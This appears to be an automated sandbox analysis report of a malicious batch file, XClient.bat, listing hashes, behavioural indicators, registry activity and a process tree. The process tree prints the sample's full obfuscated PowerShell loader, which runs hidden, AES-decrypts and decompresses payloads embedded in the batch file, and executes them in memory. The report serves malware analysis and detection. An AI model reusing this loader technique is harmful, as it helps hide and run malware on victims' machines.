Resubmissions
04-09-2024 03:02
240904-djne2svhpa 1004-09-2024 03:01
240904-djb21svhne 104-09-2024 01:09
240904-bhv3dstbjg 1003-09-2024 23:53
240903-3xrgaszhqm 1003-09-2024 23:29
240903-3gywfa1fna 1003-09-2024 23:26
240903-3ev2rs1erg 10Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-09-2024 23:29
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
XClient.bat
Resource
win10v2004-20240802-en
General
-
Target
XClient.bat
-
Size
320KB
-
MD5
e0d59aedb927f0aad0b47eab247e5fbc
-
SHA1
8abe8db8e344729b0f78d83e540b17a31893ed92
-
SHA256
ab6fed54d7e8fcd47d2888aae95498968192e13aaab8f8a09880b602ea98e81c
-
SHA512
7459cba2a54a2e26e7464f9f4863b1fedb63cfa80ed2261ee69fd9c268c5d6bb54a4d01368d7ed987387016d786fb115f84afe97e192545b1f860b020c805e97
-
SSDEEP
6144:HQIYl64Q3Gx/E7X3YIzsUW4MN2nwaF0FbD/VdFzqEE/jeT3/:HQIh77X3t6+4VdFzoW/
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2764 powershell.exe -
Deletes itself 1 IoCs
pid Process 816 cmd.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50ecde4659feda01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d793ad506ece624c80bd99362738d907000000000200000000001066000000010000200000000ab6fa147f584182ef7d34e5ae5d205e2796e31fd4eba1741aa7d4eddd3b7187000000000e800000000200002000000082368376d3b5bd1516f3ea8370137f669c69e7b40b2f31b807d591d39eea9c8090000000d75492538fbc1c34a0f63840275845f3fc4022a34b14cf9834ec916367897d2b066542c4b907cde73508541918be7149bc022e108e6454cef9b9832317639d42a9cb7c7dd2e88fe56b3d9c8722335e259a788102dc38b9129341d368a257c948c114c7623e98b805d0679e19c34363dd71f756dee5ad5467062126023238ae46ad5b73c3fe994bc16a4086a4da4ef8d8400000008ff8cb3eb4b4b3520e0d0f539d19c39dd02b119a526381c8aab2a4434e7759d94a17f720f389f3e9493bfa53a6434b6e49f956d7eb593a46dd06b40f9b39c413 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d793ad506ece624c80bd99362738d907000000000200000000001066000000010000200000008f68647efd4cd2ef7cbb1c1e9759a80c391f1721f5a478f4a006dfa533175eb6000000000e8000000002000020000000e5cbf47d08e088b9ce69326b8626f1d4173201266d9d225e7578f4e5f28389602000000087f23c6fc5b936ba8b1cea1a4dee7e8ee99160165244aeb0992896a0169d9ed340000000c3fd7d081f43e4a4a515dfbc7168b2200ce8b738ef773665730b848f9f21e208366796f9d25cebae530d4cb3720bd4003c0c8ab18121e9f50b73939385bb6b76 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{726E9821-6A4C-11EF-97FC-EA7747D117E6} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2764 powershell.exe 3024 chrome.exe 3024 chrome.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2764 powershell.exe Token: SeShutdownPrivilege 3024 chrome.exe Token: SeShutdownPrivilege 3024 chrome.exe Token: SeShutdownPrivilege 3024 chrome.exe Token: SeShutdownPrivilege 3024 chrome.exe Token: SeShutdownPrivilege 3024 chrome.exe Token: SeShutdownPrivilege 3024 chrome.exe Token: SeShutdownPrivilege 3024 chrome.exe Token: SeShutdownPrivilege 3024 chrome.exe Token: SeShutdownPrivilege 3024 chrome.exe Token: SeShutdownPrivilege 3024 chrome.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 2652 iexplore.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe 3024 chrome.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2652 iexplore.exe 2652 iexplore.exe 2576 IEXPLORE.EXE 2576 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 816 wrote to memory of 2772 816 cmd.exe 32 PID 816 wrote to memory of 2772 816 cmd.exe 32 PID 816 wrote to memory of 2772 816 cmd.exe 32 PID 2772 wrote to memory of 2800 2772 net.exe 33 PID 2772 wrote to memory of 2800 2772 net.exe 33 PID 2772 wrote to memory of 2800 2772 net.exe 33 PID 816 wrote to memory of 2764 816 cmd.exe 34 PID 816 wrote to memory of 2764 816 cmd.exe 34 PID 816 wrote to memory of 2764 816 cmd.exe 34 PID 2652 wrote to memory of 2576 2652 iexplore.exe 36 PID 2652 wrote to memory of 2576 2652 iexplore.exe 36 PID 2652 wrote to memory of 2576 2652 iexplore.exe 36 PID 2652 wrote to memory of 2576 2652 iexplore.exe 36 PID 3024 wrote to memory of 1608 3024 chrome.exe 39 PID 3024 wrote to memory of 1608 3024 chrome.exe 39 PID 3024 wrote to memory of 1608 3024 chrome.exe 39 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 1040 3024 chrome.exe 41 PID 3024 wrote to memory of 2268 3024 chrome.exe 42 PID 3024 wrote to memory of 2268 3024 chrome.exe 42 PID 3024 wrote to memory of 2268 3024 chrome.exe 42 PID 3024 wrote to memory of 1752 3024 chrome.exe 43 PID 3024 wrote to memory of 1752 3024 chrome.exe 43 PID 3024 wrote to memory of 1752 3024 chrome.exe 43 PID 3024 wrote to memory of 1752 3024 chrome.exe 43 PID 3024 wrote to memory of 1752 3024 chrome.exe 43 PID 3024 wrote to memory of 1752 3024 chrome.exe 43
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2800
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\SubmitClear.svg1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2652 CREDAT:275457 /prefetch:22⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6c29758,0x7fef6c29768,0x7fef6c297782⤵PID:1608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1196,i,4837302509172537002,3673227327660919981,131072 /prefetch:22⤵PID:1040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1196,i,4837302509172537002,3673227327660919981,131072 /prefetch:82⤵PID:2268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1196,i,4837302509172537002,3673227327660919981,131072 /prefetch:82⤵PID:1752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1196,i,4837302509172537002,3673227327660919981,131072 /prefetch:12⤵PID:2400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1196,i,4837302509172537002,3673227327660919981,131072 /prefetch:12⤵PID:560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1412 --field-trial-handle=1196,i,4837302509172537002,3673227327660919981,131072 /prefetch:22⤵PID:2560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1296 --field-trial-handle=1196,i,4837302509172537002,3673227327660919981,131072 /prefetch:12⤵PID:2956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3668 --field-trial-handle=1196,i,4837302509172537002,3673227327660919981,131072 /prefetch:82⤵PID:1492
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1788
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5ff283e2fed90f800076c89d53545dd35
SHA1c2f97f1f9679d6301a74c9308cd93f29a58f8b0d
SHA2562569068e737048690cb5525d0f4a489865a9915f4b05924a85c2311059dba24f
SHA512e7bcb4a761d9ef260c61f26763424378f13211160d30bb08e9e33ae79c23fcb322c45d05c68febfdd1b18d75ffdeb79a80695e266602976bf870e0c578897233
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e359531fe2e825e0f43b0bed22e54188
SHA19f9ce578b4bb05b3143a8c6d652ae5d35b1ff14a
SHA25634d71f565f0611cd1dd393bffcd2f060f98da193cd13a9e3f4fc79bf9ade14f7
SHA5125aee45440de8bad2be8f6d69b6fbde4cbfdba4236feac827f9a491e4c77d4b204fe90bd3b124e42c184edfc168e32465da24d3c16bda2993487549df5ae9990b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5b18b287a8ea65ab4a0078aeb59c44864
SHA140fe9680d895448524d918afc2e206614b8d4055
SHA25652453845b6fb7d157327defd7dfcb17c47c4221e9b56a16a715da5603c1ce79c
SHA512d0eefbc6fc078ee4ef47e0ce53ead47d8371702a03e827f5b95881c2b1753fb6799de2449e767461264bee73520cac38b1009504043369cc05aaebbc6cbc2231
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD50b61416629031d37216a183c3c4760fe
SHA18fe00bfe5df2a48c343ec91020748729c0e68890
SHA256cabead9fead456f1d0fefc04d7a563ec28753a7d78267e0702820de1bbd38691
SHA5120c23084023366e9bc55f00448fcf24d495f4df818f3787e14594fbba611198c6d72f4f7bbaebaf7e2dbe6d9d1d6e56db6111b7645e36d06b042dbb8b580339a5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD57919dfd59dfddefec67e36341d24154e
SHA1d0d0438674060303911314a8fdffa5b270635a17
SHA2562e7e024647eb5b3be63a20c77a5ca2a5d10314906679c742cd34293df3670430
SHA512fb6222d1dd20639c439e095a876754ad678caedcb3217541f701fe9e29b89e5d619f42319eafcb921a74b506b4a101dc32500e2092f7ff3ffd2d259c28f57a79
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD513517dadd56259e8154bd152dcad3b7e
SHA13dbbfdb519fbf003dcb0bfc5dcb2e3c3c4916fc0
SHA2562f6a7c8a385a4a720def503a172f50e89c35d6feb9d70561b1740423e48cbe20
SHA512875f1f8d0029b0e3b200608277906bfcbd010e46e7dd1d5d52140a5f92ccd8e01b5820b7b786cc9a5888063bca432c4606f87e24f53436fb70dd18fc8958da81
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5fb6bea6fea5ce3af7196d4ee81cfd408
SHA1930e49719ac926162d1408f5f65461d9122ada25
SHA25649267d70a5fef7a65ef0370e23906bb426a214377ca8c578022c36c88258d12c
SHA512a0986b78fb3161546f1e9d72e074e119e5f0b52bfc6996ba0df49b08a49eadb001253643c5f3a060269e84ed0a30e08c2f933ef103d79bc206e1a1f6c7201de8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD554ab7fecb457a510591cb7b864dfc9a9
SHA1adf87cec9d259ff9055aef27662a0dfe2c923040
SHA256fb197d5dfc4b912200b2f46432b0bd53989c15b3478eb6ed58ce91e51fdd5186
SHA51239235fd42da84db8c9853328094aec00cc7f23b5a893a20f2badba7435a6ec7e34518421d7c5b8eb45567c08619111733effec5fa1d000aa57f10fcac26b5cba
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD59f033488967f7315f206d482c4460bb4
SHA13e64a4e31b8df51815b7d6cafeea63850386a21e
SHA256d22a77c40ff661b67c257ec98ed2725438ff2debbe303e463275d3872cedc533
SHA51266e8f2e8693b14a95ed788579d1b503c1fa6d34a88d8efeaec7c3873fbbcd088aea7d572f2a6156cd6d29837efa9e46239f95c09703d3cac4b840099cd59daf6
-
Filesize
336KB
MD5adaa2714eb95f049e577de29928c967a
SHA1a087326a68f238df5ed72837fa37d33e2e722955
SHA256f1af4926a1bd5b32be89bdb2e732ae772027ac44d3696e7489a73cf2a059b066
SHA5122a04a73e6b21ff421a0d85595de43c33c1170af35df05e3355f528760900c66ee02f259580b1b9d45d097fd20f6ecd5f688e7fcf5ffa394066e85a2b26e0eb08
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
335KB
MD5c48e41b3b7db9142f48966c6c74671a4
SHA18f9ba8b61f8234f4e49fb20ceea4555e0c5142bb
SHA256d79310dbe3e1cdd48dee1b87a8be2b90078e229a9bc077fab9b1922f5d2120d4
